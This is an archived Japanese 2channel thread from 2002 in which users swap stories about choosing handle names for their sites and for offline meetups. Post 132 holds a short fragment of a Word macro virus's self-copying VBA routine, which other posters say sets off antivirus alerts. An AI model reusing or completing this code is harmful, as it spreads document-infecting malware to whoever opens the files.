2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

◆ おいお前ら、HNはどうしてますか? ◆

1 :Name_Not_Found:02/07/01 04:31 ID:???
管理人として名乗るときの名前、
あるいは他人様のサイトを訪れるときの名前、
どんな感じで決めてますか?

本名もじってたりしますか?
何か好きなキャラクターの名前とかですか?

2 :Name_Not_Found:02/07/01 04:35 ID:???
終了

3 :Name_Not_Found:02/07/01 04:37 ID:???
再開

4 :Name_Not_Found:02/07/01 04:37 ID:???
糞スレ立てるな、ハゲ!
制作王にでも聞いて出直せ!

5 :Name_Not_Found:02/07/01 04:46 ID:???
制作王ウザイ

6 :Name_Not_Found:02/07/01 06:46 ID:???
のりでつけたHNは後々さむいことになるぞ。
HNは楽しい時ではなく鬱なときに冷静に考えるがいい。

7 :Name_Not_Found:02/07/01 16:15 ID:XiGcWyor
>>6
具体的にキボン

8 :Name_Not_Found:02/07/01 16:21 ID:???
本名もじったりしない。
もじったら変になる、それなら本名名乗る方がマシ。

自分のサイトと同じ種類のサイトに行く時は同じHN
ついでに宣伝したりする


9 :Name_Not_Found:02/07/01 16:58 ID:???
普段友達に呼ばれてるあだ名だったりする。

10 :Name_Not_Found:02/07/01 17:14 ID:???
>>9
じゃあ俺は盲腸だ

11 :Name_Not_Found:02/07/01 18:05 ID:???
ミドルアースで生成するとか。
http://www.barrowdowns.com/middleearthname.asp

12 :Name_Not_Found:02/07/02 12:00 ID:LXT4PgJ4
>>10
禿しくワラタ

13 :Name_Not_Found:02/07/04 01:57 ID:???
おいお前ら、漏れのHNを考えてください。

14 :Name_Not_Found:02/07/04 02:00 ID:zdBAb5wJ
>>13
貴殿には偉大なる「ホームページ忍者くん」の称号を与える。
さぁ私とともに闘おう! 世界標準の素晴らしさを無能なweb板住民に告知するのだ!

15 :Name_Not_Found:02/07/04 02:12 ID:???
>>13
「製作王 of 製作王s」だな。

16 :Name_Not_Found:02/07/04 02:32 ID:???
HN考えるのって難しくない?
自分はいつも、いい名前が浮かばなくて挫折するよ。
で、結局本名(下の名前)のまま。
つまんないなと思うんだけど、まったく違うHNを考えてみても、
何となくその名前と自分の間にギャップみたいなものを感じちゃうんだよね。

…マジレスしてしまった。スマソ。

17 :Name_Not_Found:02/07/04 03:11 ID:???
>>16
オフ友人にサイトハケーンされたときに恥ずかしくない。

18 :Name_Not_Found:02/07/04 03:16 ID:???
>>16-17
確かにリアル知人に言うのが恥ずかしくない名前に
した方がいいよね。どこか恥ずかしい名前はやっぱ
変なことが多い。

19 :Name_Not_Found:02/07/05 02:30 ID:???
一度なじんだ名前は変えにくいからね。
恥ずかしい名前を付けるとオフの友人には絶対HPを教えられないよ。

俺はオフでのあだ名で作ったダミーページも作ってる。

20 :Name_Not_Found:02/07/05 03:38 ID:???
ダミーページ(・∀・)イイ!

オフ友人に言いづらいHN使うようになって、
オンライン友人以外に見せることが難しいと気付いて鬱。

21 :Name_Not_Found:02/07/05 03:45 ID:???
2ちゃんに出入りするようになってから、ハンドルネームに対する執着心みたいのが
凄く減りました。以前はスゲー凝ったヤツ考えたりしてたけど、今はその場の思いつき。

22 :Name_Not_Found:02/07/05 04:17 ID:???
そう言えば初めて2ちゃんに来た頃(匿名性とか全然考えもしなかった頃)
皆が皆同じHN使ってんのかと思ってチョトビクーリしたよ。
今でもヲチとかで2ちゃんを知らないデムパ房が降臨するとすごいことになってるけど。
「名無しさんばっかりですね」みたいな。

23 :Name_Not_Found:02/07/05 15:02 ID:2MWKHw7A
オフ会とかでハンドルネームで挨拶するのが
なんとなく恥ずかしかったから本名(苗字)のまま。
だってさ、ハンドルネームが「おにぎり」だったりしたら、
「どうも、おにぎりです」って言わなければならないだろう?


24 :Name_Not_Found:02/07/05 15:23 ID:???
オフ会はさすがに本名だすた

25 :Name_Not_Found:02/07/05 15:32 ID:2MWKHw7A
>>24
うそ!?俺があった人はずっとハンドルネームだった…

26 :Name_Not_Found:02/07/05 15:37 ID:???
オフの時は事前にメッセとかでお互いに顔も本名も晒してる。

27 :Name_Not_Found:02/07/05 15:42 ID:???
漏れのところは実際に合うまでお互いに顔も知らなかったぞ。
もちろん本名なんてもってのほか。

28 :Name_Not_Found:02/07/05 16:02 ID:???
>>22
初めて2chに来た時、『"奥さまは名無しさん"って奴、書き込みしすぎだよ』って思った

29 :Name_Not_Found:02/07/05 20:31 ID:n2ynrBAk
○○(苗字)ちゃん。 だってあだ名とか無かったんだもん…

30 :Name_Not_Found:02/07/05 20:50 ID:aKIz7JD+
>>11
難解だよー

31 :Name_Not_Found:02/07/05 21:31 ID:yJyW93mo
最初から最後までHNで会話するオフってやだな…
HNがあだ名としてやってけそうなものならまだしも。

32 :Name_Not_Found:02/07/05 23:40 ID:???
オフでもHNで呼び合ってるよ。
本名を知ってる人も居るけど本名では呼ばない。
逆に本名で呼ばれると「本名言うな!」ってことに。

店を予約するときもHNでするやつもおる。
「あのぉ、予約したブラックですけど・・・」

33 :Name_Not_Found:02/07/06 03:41 ID:???
昔、ゲーセンで占いエレメカがくれたニックネームつかっとる。
ゲーセンノートのPN時代とあわせて、もう、かれこれ7年ぐらいか。
すでに本名で呼ばれる方がしっくりしない。







34 :Name_Not_Found:02/07/06 04:24 ID:q26v5d+4
龍我○○とか水無月○○とか、自分で言ってて恥ずかしくないのかな

35 :Name_Not_Found:02/07/06 09:38 ID:???
オフ下位か〜平和ながらやや閉鎖的な雰囲気があるんだろうな。

36 :Name_Not_Found:02/07/06 23:53 ID:???
どこかの漫画にそんなネタあったな。

いやあちこちにあるか。鬱。

37 :Name_Not_Found:02/07/07 00:00 ID:???
小5の頃に考えたヤツを10年近く経った今でも愛用してる。

自分は野菜のハンドルネームだけど、オフの時もそのまま呼んでもらってた。
オフラインでちょっと会うだけだしな。

>>35
昔の自分を思い出した。

38 :Name_Not_Found:02/07/07 00:11 ID:???
>>34
元ネタわからんけど、そんな恥ずかしいHNつけてんのってアニヲタとかだろ?
やつらにゃ同族で群れることによって「恥」という神経が麻痺してるからな。

39 :Name_Not_Found:02/07/07 01:02 ID:???
恥の文化日本

40 :Name_Not_Found:02/07/07 02:27 ID:???
もう10年以上ちょっとづつ変化しながら使ってるが、元ネタの元ネタは
恥ずかしくて語れないな(w

恥は日本の文化です

41 :Name_Not_Found:02/07/07 02:34 ID:???
思い出と一緒に人間は成長するモノです。

恥は日本の文化です

42 :Name_Not_Found:02/07/07 02:42 ID:???
掲示板デビューが某ビジュアル系バンドのファンサイトだったんで、
超恥ずかしい漢字の当て字(※)してた……。
ちなみにそのハンドルは、カタカナ表記で今でもメインで使ってる。
つっても2ちゃん以外出入りしてないから、実質使ってないんだけど。

※例えば、「リュウカ」に「瑠架」とか。

43 :Name_Not_Found:02/07/07 02:42 ID:DoMl3Tfv
HNが一文字の奴ってヤバくないか?
読んでても読みにくい。
言うのも言いにくい&聞きにくい。

44 :Name_Not_Found:02/07/07 02:53 ID:???
>>43
いま俺がつかってるHN、アルファベット一文字ですが何か?
当然捨てハンだけど。
確かに一文字HNはちょっとな。あとHNに最初から「〜さん」「〜チャン」
とか付いてるやつも嫌い。

45 :Name_Not_Found:02/07/07 03:19 ID:???
>>44
名無しさん、とかなw

46 :Name_Not_Found:02/07/07 10:43 ID:???
ハチミツとイレブンPM

47 :Name_Not_Found:02/07/07 11:17 ID:???
>>44
43が言ってるのは「あ」「い」「う」みたいな名前だろう。

ところで俺は数字をハンドルにしたんだけど、オフに参加したくなって
速攻で読み方を作ったことがある。


48 :Name_Not_Found:02/07/07 23:19 ID:???
>>47
> オフに参加したくなって

ワロタ

49 :Name_Not_Found:02/07/08 23:36 ID:???
あげ

50 :Name_Not_Found:02/07/08 23:41 ID:???
好きな小説の登場人物の名前をもじった。
オフでその名前で呼ばれるとくすぐったかったが、
今はその名前の方がなじんでいるといわれる。
本名の俺はどこかに消えたらしい...。

51 :Name_Not_Found:02/07/09 00:18 ID:???
本名を英訳した。
正直なところ微妙だけど他にいいのが思い付かない。
以前使ってたHNはもっとダサイ(鬱

52 :Name_Not_Found:02/07/10 01:28 ID:???
>>51
本名を英訳すると凄いことになるので漏れの場合不可。

53 :Name_Not_Found:02/07/10 10:02 ID:A8jdIQwm
アジシオ太郎

54 :Name_Not_Found:02/07/10 13:23 ID:???
http://www.google.com/search?num=100&hl=ja&filter=0&newwindow=1&lr=lang_ja&q=%83A%83W%83V%83I%91%BE%98Y

55 :Name_Not_Found:02/07/10 16:52 ID:???
ハチミツボーイ

56 :Name_Not_Found:02/07/10 16:56 ID:???
とある分野のポータル系サイトを運営しているので
個人情報すべて晒してます。(涙

57 :Name_Not_Found:02/07/10 17:11 ID:TMqOxMgD
(・∀・)イイ!

58 : :02/07/10 17:31 ID:AL7aCdPN
http://toshizo.com
管理人 土方ゆうと
幕末の新撰組副長 土方歳三から拝借
でも、掲示板で「土方さん」って言われると、恥ずかしがったりする
その上、他の歴史サイトで
土方○○と言うHNで名乗る人のサイトの掲示板に殴り込み
「私の土方さんを勝手に名乗るなぁぁぁ」

自分は「土方」を名乗るのは許せるが、他人には「土方」を名乗ることを許さない
サイテーの30代後半独身女性です。

59 :Name_Not_Found:02/07/10 18:23 ID:???
>>58
そーゆーのはヲチ板でどうぞ。

60 :Name_Not_Found:02/07/10 18:45 ID:???
お前等さりげなくクロ高ネタだしてんじゃねーよ(w

61 :Name_Not_Found:02/07/10 18:58 ID:???
>59
ヲチ板、日本史板、半角板で晒し上げしてますた
2ch初期からの痛いヤシで有名だYO

62 :Name_Not_Found:02/07/10 19:08 ID:???
>>61
お前も痛い

63 :Name_Not_Found:02/07/10 20:17 ID:???
好きな芸能人から
なんだか本名っぽいのでオフで呼ばれても恥ずかしくないです

64 :Name_Not_Found:02/07/11 01:45 ID:???
どうでもいいことですがHNをホームネームと
読んでいたPC初心者の頃を思い出しますた


いや、それ以前の問題かもなー

65 :上祐:02/07/11 01:50 ID:???
マイトレーヤ正大師

HN違いスマソ

66 :Name_Not_Found:02/07/11 04:02 ID:???
>65
ホーリーネームワロタ

67 :Name_Not_Found:02/07/11 23:59 ID:???

ML 女医マヤの「セクシー心理学」
http://www.melma.com/mag/83/m00010683/a00000083.html
によると、

   売れるグループ名は「すぐに意味を連想できないもの」である。
   逆に「すぐに意味を連想できる」と、売れにくくなる

らしい。
これはHNにもあてはまるんだろか


68 :Name_Not_Found:02/07/13 08:18 ID:oKAxb6oF
なわけねぇだろ

69 :Name_Not_Found:02/07/13 08:39 ID:???
HNは女性っぽいの使っていますが・・・?
 女性になりすましていたほうがホムペの管理が楽ですね。きっと。

70 :ロボ鉄 ◆MGTy6iYI :02/07/13 08:44 ID:bMo/JxAV
色々なHNを使ってきて最後にロボ鉄となったのですが、センスは悪くもないと思いますがどうでしょうか このHNは。

71 :46:02/07/13 09:12 ID:xf9IUwAE
>69
自分は、男に成りすまして管理人してます
男でよかった、管理が超ラク!って思ってます。

72 :Name_Not_Found:02/07/13 11:01 ID:???
HNは性別不明ぐらいが楽な気がする。

私は、以前は厨房の頃に考えた同人用PNをそのまま使っていましたが、
サイトを開く段になって、いくらなんでも○○歳でこの名前はイタすぎる、と思い
本名をもじったHNに変えました。
もう恥ずかしくナイです。

73 :Name_Not_Found:02/07/13 17:57 ID:???
同人やってるようなヲタが今更そんなこと気にするなよ(w

74 :Name_Not_Found:02/07/14 00:55 ID:NXI9t7RC
>>72-73
ワラタ

75 :(・ε・):02/07/14 01:09 ID:mc0sTvBb
管理人プロフィールには
HN、メアド
この2項目しか書いてない
でもそれで十分と思ってます。

76 :Name_Not_Found:02/07/14 01:10 ID:???
,,,,,

77 :(・ε・):02/07/14 01:13 ID:???
>>76
ごめんね・・・・

78 :Name_Not_Found:02/07/14 03:46 ID:???
馴れ合いの自己紹介板に逝けばいいと思われ

79 :イタチゴッホ:02/07/14 05:54 ID:KmqOh7HC
このHN恥ずかしいです

80 :デカマンコ:02/07/14 06:51 ID:???
このHN恥ずかしいですが気に入ってます

81 :Name_Not_Found:02/07/14 12:36 ID:???
プロフィールに自分の性別乗せてます?

82 :Name_Not_Found:02/07/14 14:11 ID:???
>>81
一応載せてますが必要性が感じられないので消そうかと思ってる。

>>34
ちょっと待て、水無月さんって普通にいるじゃん
アニヲタと一緒にしたら惨いぞ(藁

83 :Name_Not_Found:02/07/14 14:40 ID:???
>>79
カコイイ!!

84 :イタチゴッホ:02/07/14 23:49 ID:???
>>83
ありがとう、そんな事言ってくれるの君だけだよ。

85 :Name_Not_Found:02/07/16 18:28 ID:???
age

86 :Name_Not_Found:02/07/16 18:33 ID:???
http://www.google.com/search?num=100&hl=ja&ie=Shift_JIS&newwindow=1&q=%83C%83%5E%83%60%83S%83b%83z&btnG=Google+%8C%9F%8D%F5&lr=lang_ja

87 :Name_Not_Found:02/07/16 19:12 ID:???
思えばHNって、パソ通時代、IDやカナしか使えなかった頃の識別用、
本名だけではその人の個性が伝わりにくい、という部分でメリットだったと思う。
けど、今当たり前になりすぎて、なんで使ってるのかわからない時もある。

以前、一度仕事関係のサイトで仕事を手伝ってくれる人募集した事あったんだけど、
連絡先がメールアドレスとHNしかない奴いてさ、
こいつこれでどうやって仕事するつもりかと・・・

88 :(´Д`)/ ◆GoYYYYYY :02/07/16 19:28 ID:???
(´Д`)/だったり・・・

89 :Name_Not_Found:02/07/17 18:00 ID:???
コテハン参加期待 age

90 :Name_Not_Found:02/07/17 18:25 ID:???
「固定ハンドル」ってなんかなあ

91 :Name_Not_Found:02/07/17 22:55 ID:KKkh5fG0
"℃"とか含むHNの奴がいてオフでどう呼べばいいのか困ったな。
後、2ch初心者だった頃名前欄に名無しさんをコピペして書き込んでた。

92 :ia:02/07/17 22:59 ID:???
こういう場合はどう呼びますかおまいら。

93 :Name_Not_Found:02/07/17 23:06 ID:???
カロセンリーチ氏

94 :ad:02/07/17 23:19 ID:Uu3vSfn7
>>93
ワラタ。

95 :fl:02/07/17 23:26 ID:???
こういう場合はどう呼びますかおまいら。

96 :Name_Not_Found:02/07/17 23:28 ID:LjwzYbLK
むかーし昔好きだったアニメキャラの名前をもじってつけた。
軽く15年くらい前か。

97 :Name_Not_Found:02/07/17 23:30 ID:???
>>95
縦読みして欲しいんだろ?
ヘタ


違った?
(´・ω・`)ショボーン・・・

98 :Name_Not_Found:02/07/17 23:32 ID:???
そーいや、こないだ「いかにもオフ会です」っての電車で見たな。
どこかよそよそしくて、1歩引いてて変な名前で呼び合ってるの。

99 :Name_Not_Found:02/07/17 23:33 ID:E9FBxtwf
>98
なんかワラタ
漏れアンチ御深い

100 :fl:02/07/17 23:51 ID:D0ntMaBa
100ゲトズザー

101 :`_?:02/07/18 15:37 ID:???


102 :Name_Not_Found:02/07/19 13:48 ID:???
>>64
私は英単語を適当に読む癖があるので
昔、ホーンネームと読んでいますた。。ワケワカラン
>>92-93
実際に使ってる方いますよね。

103 :fl:02/07/20 06:16 ID:???
>>102
> 適当に読む癖

ワロタ

104 :バiタ:02/07/20 14:51 ID:???
漏れのHNはどうしよう…


余談ですが
漏れの友達はHN(ハンドルネーム)を「エイチエヌ」って言う人が居ます
普段の会話では「君のエイチエヌ教えて!」とか言ってます
他にもHP(ホームページ)を「エイチピー」とか言ってます
だから「君がエイチピー作ったらアドレス教えてね!」とか行ってます
会話では普通に「ハンドルネーム」とか「ホームページ(厳密にはwebサイト)」と言ってホスィです

105 :fl:02/07/21 01:53 ID:???
>>104
ワロタ
「エッチエヌ」とか言われないだけマシな罠

106 :バiタ:02/07/22 01:35 ID:???
age

107 :Name_Not_Found:02/07/23 16:03 ID:???
「あの……みるみるさんですか?」
「あ、はいそうです」
「どうも、初めまして。なんか、ホームページの印象と同じですね」
「あ、え、そう……ですか」
「知的で可愛いっていうか、なんか嬉しいです」
「ありがとうございます」

 二人、いい雰囲気で横浜の中華街へと向かう。

「あの」
「はい」
「えっと、メールでの名前が番号になっているんですけど、ハンドルとかお持ち
になっているんですか?」
「ええ」
「どんなハンドルですか?」
「名無しさんアットマークそうだ選挙にいこう、です」
「え?」
「名無しさんアットマーク、このアットマークってのは小文字のaを丸でくくっ
たようなやつです。で、そうだ選挙にいこう。名無しさんアットマークそうだ選
挙にいこう、です。まあ、捨てハンですね」
「はあ……」
「みるみるさんは、なにか食べたいものありますか?」
「えー……と、そうですねぇ……名無しさんアットマークそうだ選挙にいこうさ
んはなんかありますか?」
「餃子きぼーん」
「……え?」

「餃子きぼーん」

「餃子きぼん、ですか? あの、どんな料理なんですか?」
「いや、料理の名前じゃなくて、餃子を食べたいっていうことです」
「はぁ……」
「あ、そうだ、チャーハソってどうよ?」
「え?」

「チャーハソってどうよ?」

「チャーハソってどうよって……いきなり言われても……ちょっと。チャーハソって知らないので……」
「僕があんまり美味しくないと思っている炒飯のことです」
「はぁ……そうなんですか……」
「……」
「……」
「……」
「……」
「age」
「え?」
「いや、チャーハソってどうよに対する答えが聞きたいもので」
「はぁ……いや、あんまり炒飯って好きじゃないんです、ごめんなさい」
「sage」
「……」
「もういいです、ってことです」
「……はぁ」

108 :Name_Not_Found:02/07/23 16:07 ID:uUpGzWb1
机の上においてあったある物から適当につけました。
あと、自分のキャラと正反対な感じのHNをつける場合もあります
みるく♪とか(オゲ)

109 :Name_Not_Found:02/07/23 16:22 ID:???
>>107
ワラタ(w

110 :Name_Not_Found:02/07/23 17:06 ID:???
>>107
もうちょっと長くなかったっけ?
勘違いだったらスマソ。

111 :Name_Not_Found:02/07/23 17:50 ID:0/nGBGoG
コメント求む、このサイト。
ttp://noberu_karby.tripod.co.jp

112 :Name_Not_Found:02/07/23 17:53 ID:???
>>111
スレ違い氏ね

113 :Name_Not_Found:02/07/23 23:04 ID:???
HNってなに?

http://www.ne.jp/asahi/minazuki/bakera/html/qa/zokugo#handle-name
http://www.big.or.jp/~roadist/gy01.htm
http://homepage1.nifty.com/PC-GAMER/zatu/comp/q_word.htm
http://mr.jpn.org/~oz/web.html (欄外コラム)

114 :Name_Not_Found:02/07/28 21:47 ID:???
あげ

115 :Name_Not_Found:02/07/29 18:49 ID:BfWzftoT
>>13

諸星段田男で逝け

116 :Name_Not_Found:02/07/29 20:54 ID:???
このスレ面白すぎ。

117 :Name_Not_Found:02/07/30 07:24 ID:???
本名のアナグラムは

118 :Name_Not_Found:02/07/30 09:03 ID:???
しゃれてるな。発想が。

119 :Name_Not_Found:02/07/30 10:45 ID:???
タカシ → 仕方

120 :Name_Not_Found:02/07/30 11:34 ID:5zDeXjX8
http://www.google.co.jp/search?hl=ja&ie=UTF-8&oe=UTF-8&q=%E7%80%AC%E6%88%B8%E5%86%85%E3%82%B8%E3%83%A3%E3%82%AF%E3%82%BD%E3%83%B3&lr=

121 :Name_Not_Found:02/07/30 12:13 ID:???
× ハンドルネーム
○ ハンドル

じゃなかったっけ

122 :禿じるしくガイシュツだが、:02/07/31 10:40 ID:???
HNはホーリーネームの略です。

123 :Name_Not_Found:02/07/31 12:58 ID:7bxzgUO3
ホーリー(・∀・)ネーム

124 :Name_Not_Found:02/07/31 14:25 ID:???
>>1
うんこ

125 :ホーリー:02/07/31 19:20 ID:???
ばけばけばぁ〜

126 :Name_Not_Found:02/08/01 14:31 ID:???
ミミミミミ
(・Д・)<ボクに何か用?
VHN

127 :Name_Not_Found:02/08/02 17:01 ID:???
夏厨寄ってくると面白そうなのであげ

128 :Name_Not_Found:02/08/02 22:53 ID:???
>>127=夏厨

129 :igbd:02/08/02 23:28 ID:cmciJeMV
いいじゃん。
読めなくたって。

130 :Name_Not_Found:02/08/02 23:41 ID:PDQMTWE1
http://www.google.co.jp/search?q=%91%EA%90%EC%83N%83%8A%83g%83%8A%83X&ie=Shift_JIS&hl=ja&lr=

131 :いつも名無し:02/08/05 10:31 ID:zyguyZhC
>>129
カロリーメイトと読んでみる。昔のハンドルは●YAだったなぁ。今でも検索かけたら出てくるんだろうな
……英語のサイトが(w

132 :Name_Not_Found:02/08/05 12:44 ID:???
ToInfect.CodeModule.AddFromString ( "Private Sub Document_Close()")
Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop

133 :Name_Not_Found:02/08/06 12:30 ID:???
またノートン先生か何かのスクリプト?

134 :Name_Not_Found:02/08/06 14:08 ID:g8Gxualo
キャラを作る仕事をした時
提案した名前が商標とれなくて
結局自分のHNを付けて商品化したことがあるよ。
仲間うちでは大ウケ。良い記念になりますた。

135 :Name_Not_Found:02/08/07 17:21 ID:jJaY9XFw
検索にかからないハンドルがいい。
意味のある言葉とか。

136 :Name_Not_Found:02/08/07 18:52 ID:xyI6J7KF
よくよく思えば、同人っぽいHNだ俺w
まあ苗字と名前とあるんだが、一応下は普通にある名前なんで
オフで呼び合う事があっても違和感は無いと思うけど。

>>69>>71>>72みたいに、性別は謎な感じなのを使ってるんだが
これは(・∀・)イイ!!
無礼厨房が「管理人さんは男ですか女ですか?」とかストレートに聞いてくるのに対して
鉄槌下したりとか。悪趣味だ俺w


しかし俺のサイト、ちょっと前までW杯関連の名前を
そのままHNとして名乗る奴が続出してたよ。
「今日からHNベッカムに変えます!」とかw
そーいう流行に乗って決めたHNなんか、すぐまた変えたくなるだろうに。
で、変えまくったらもう覚えてもらえない。

137 :Name_Not_Found:02/08/07 20:11 ID:???
HNとか

138 :Name_Not_Found:02/08/07 23:52 ID:???
道で呼ばれた時恥ずかしくないようにって、あえて苗字にしたら、
どんない仲良くなってもいまだに苗字で呼ばれる・・・複雑。

139 :Name_Not_Found:02/08/13 01:52 ID:???
あげ

140 :Name_Not_Found:02/08/13 02:22 ID:tVctEJ1c
おい!お前ら、開くとノートン先生が吠えるスレはここですか?

141 :Name_Not_Found:02/08/13 02:26 ID:???
>>140←こいつは今頃何を逝ってるんでしょうか?>>143

142 :Name_Not_Found:02/08/13 02:42 ID:???
sageマン

143 :Name_Not_Found:02/08/13 02:45 ID:???
>>141
ほぅ・・・相当病んでますなぁ・・・。

144 :Name_Not_Found:02/08/13 03:57 ID:e4moKr3I

                \ │ /
                 / ̄\   / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
               ─( ゚ ∀ ゚ )< さいたまさいたま!
                 \_/   \_________
                / │ \
                    ∩ ∧ ∧  / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄\∩ ∧ ∧ \( ゚∀゚)< さいたまさいたまさいたま!
さいたま〜〜〜!   >( ゚∀゚ )/ |    / \__________
________/ |    〈 |   |
              / /\_」 / /\」
               ̄     / /






145 :Name_Not_Found:02/08/13 09:05 ID:???
>>136
居たねそういうヤシ。俺のところにもD.ベッカムとかカーン様とか
ムネオさん、タシーロ属性の頭の悪い時事改変HN何人かいた。
厨工房ってなんであーいう見通しも信条も無いHNに変えたがるんだろ。


146 :Name_Not_Found:02/08/14 01:02 ID:???
じゃあ信条のあるHNがどんなものかと小一時間問い詰めたい。

147 :Name_Not_Found:02/08/14 23:46 ID:???
信条のあるっつーと「ベジタリアン」とかだな。「仏教徒」とか。
あるいは「サンタなんかいない」とか、文章ぽいヤツ。


こんな人いるのかな…

148 :Name_Not_Found:02/08/15 00:14 ID:???
>>147
禿しくワロタ

149 :Name_Not_Found:02/08/15 00:46 ID:???
自分のHNで検索したら1400万件もヒットした

150 :ひよっこ ◆HeNslLTA :02/08/16 02:29 ID:???
下の名前をカタカナで。
難しい漢字で書いてあると凹む(当て字だとさらにダメ)
気取りすぎたものだと ふ〜ん って思っちゃいます。

151 :Name_Not_Found:02/08/16 05:07 ID:???
"℃"がGoogleで検索できないんで、自分の事書いてあるページが見つけ辛いです。

152 :いつも名無し:02/08/18 01:51 ID:???
Name_Not_Foundは3940件ヒットした
http://www.google.co.jp/search?q=Name_Not_Found&ie=UTF-8&oe=UTF-8&hl=ja&lr=

153 :Name_Not_Found:02/08/25 06:37 ID:???
>>152
2chが大量にヒットしてる罠

154 :バiタガロg:02/08/25 20:51 ID:???
慮る

155 :.:02/08/29 09:34 ID:???


156 :Name_Not_Found:02/08/29 11:29 ID:???
管理人
と名乗ってます。

157 :Name_Not_Found:02/08/29 12:08 ID:???
[2ch]
2chでは、常駐板が男性比率が極端に高く、
女だと分かると色々厄介だから、
性別わかんないようなハンドルにしてる。
一人称は「漏れ」
その他の言葉の節々も、極力ぶっきらぼうに書くようにしてる。

[2ch以外]
プロフィールには性別は書かない。
ハンドルが、自分の名前を片仮名にしただけだから、
どう見ても女(w
でも、モー娘。で同じ名前の子がいるので
真似してると思われそうで嫌だなと感じる今日この頃。

158 :Name_Not_Found:02/08/29 12:35 ID:???
カオリ

159 :Name_Not_Found:02/08/29 14:54 ID:???
今更だが>>107ワラタ

160 :Name_Not_Found:02/08/29 16:29 ID:???
>>107はラウンジの有名な文章ですよ

161 :Name_Not_Found:02/08/29 16:46 ID:???
>>107には続きがあるん?

162 :Name_Not_Found:02/08/29 18:13 ID:???
たしか、
みるみるさん「じゃ、私もぎょうざ」
名無しさん@そうだ選挙に行こう「概出です」
みるみるさん「えっ・・・?」
名無しさん@そうだ選挙に行こう「もう頼んだということです」
みたいなのが・・・

163 :Name_Not_Found:02/08/29 18:15 ID:???
あった。
http://teri.2ch.net/entrance/kako/970/970280290.html

164 :Name_Not_Found:02/09/22 02:07 ID:???
age

165 :Name_Not_Found:02/09/22 23:25 ID:???
http://board.lycos.co.jp/lycos/board/beginners/board/index.php3?qid=178
あなたのハンドルネームの由来、教えて!!

166 :Name_Not_Found:02/09/24 19:13 ID:???
あのあれだ、お風呂屋によくおいてあるグレープフルーツ味のあの美味い某アイス。
あれ。

もういっこのは、なんか好きなお茶の名前。


適当精神

167 :Name_Not_Found:02/10/13 21:57 ID:???
本名。
ありきたり、でもかち合ったことが無い。
不思議なくらいに、サイトもちょびっとだけ有名なんですが
ネット上でHNがかみ合ったことが無い。

168 :Name_Not_Found:02/10/13 21:58 ID:Fd6kCAYT


169 :Name_Not_Found:02/10/13 22:18 ID:???
たまたま机の上にあったとあるお菓子の名前の最初の方の単語を使ってるな、ずっと。
たとえば「チョコレート」だとすると、「チョコ」って漢字?
いやそんな愛らしいモンじゃないけどさ

170 :Name_Not_Found:02/10/13 22:59 ID:???
外人の名前です。
ええ、まったく本名とは係わり合いは無いんですがね。

171 :Name_Not_Found:02/11/10 20:36 ID:bZnfgTg2
( ̄ー ̄)

顔文字嫌いな掲示板管理人にはウケが悪いです。

172 :Name_Not_Found:02/11/11 10:05 ID:???
自分のHNで検索したら約6,830,000件出てきた。
変えたい。

173 :ヽ(´ー`)ノ :02/12/21 00:16 ID:3Cuegah8
あげあげ

174 :Name_Not_Found:02/12/21 00:35 ID:???
ラジオ番組にネタ投稿してた頃のPN。
今サイトで扱ってるのその番組のパーソナリティだった人だし、
イベントとかでもその名前で呼ばれてるから変えるに変えられなかった。

175 :Name_Not_Found:02/12/21 00:52 ID:???
215,000件

176 :Name_Not_Found:02/12/21 01:09 ID:???
13,500,000件

177 :Name_Not_Found:02/12/21 01:10 ID:???
「プリンス」とか「姫」とかは?

178 :Name_Not_Found:02/12/21 01:17 ID:???
○○ちゃん
とか
○○姫or○○王子
とかどうよ?

179 :Name_Not_Found:02/12/21 01:35 ID:???


180 :Name_Not_Found:02/12/21 01:43 ID:???


181 :Name_Not_Found:02/12/21 02:02 ID:???
ボクは92件だったな。

182 :Name_Not_Found:02/12/21 02:24 ID:???
>>178
>○○姫or○○王子
○○玉子、ならみたことあるが…

183 :Name_Not_Found:02/12/21 12:11 ID:F/FE7kNK
2chで出たIDを適当にいじった

184 :Name_Not_Found:02/12/21 18:29 ID:???
現在は以前適当につけたハンドルから付いたあだ名を名乗ってる。
しかしハンドルを変えたことを知らない人達には気付かれなかったりする。

いや、あなた方ですよ、私をそう呼び始めたのは。

ちなみに検索すると全く関係の無いサイトばかりが目に付きます。

185 :Name_Not_Found:02/12/22 18:03 ID:???
>>184
意味がわからん

186 :Name_Not_Found:02/12/22 19:33 ID:???
>>185
ハンドルをあだ名に変更してみたら、そのあだ名の名付け親達?が気付かない。

187 :Name_Not_Found:02/12/22 20:21 ID:???
ぐぐったが、1件しかhitシネエヨ

188 :Name_Not_Found:02/12/22 22:00 ID:???
半角空白です

189 :Name_Not_Found:02/12/23 01:37 ID:???
今までHNは(本名もじり)同じもの名乗りっぱなしだった。
で、ぐぐってないけど、ネットしてると同じHN多い。
私のHNを使ったフリメ宛に、間違いメールが来たり面倒。
で、今度新たにサイト運営に関わる事になって、
それを機にHN変えようか迷ってる。
↑の面倒HNを捨てたくなった。じゃあ、いざ本名で!
…となると、本名が珍しい方に入るので、なんかいやだー。
どーしたもんかー。

190 :Name_Not_Found:02/12/24 17:14 ID:???
本名(フルネーム)を出したりすると検索するリアル知り合いが結構います
ボクも何度か見つかりそうになったけど「きっと同姓同名だよ、ハハハ」
なんて危ない言い訳で逃れたりしますた。

で、恥ずかしくないHNってどんなのがあるのか

191 :Name_Not_Found:02/12/25 16:34 ID:???
Name_Not_Found

192 :Name_Not_Found:02/12/26 09:08 ID:???
>>190
ティムポマンってどう?

193 :Name_Not_Found:02/12/26 23:12 ID:qlBWSVRD
>>190
ムキンポ

194 :Name_Not_Found:02/12/28 13:53 ID:???
ふー

って名前にした。

195 :Name_Not_Found:02/12/29 10:43 ID:???
自分の下の名前をそのままひらがな表記。




まさか某巨大掲示板の管理人とバッティングするとは・・・。

196 :Name_Not_Found:02/12/30 06:40 ID:???
ひろゆ子?

197 :Name_Not_Found:02/12/31 16:34 ID:D5hOqmI/
>>182
>○○玉子、ならみたことあるが…
片岡?

198 :Name_Not_Found:03/01/01 21:43 ID:ROV9osZU
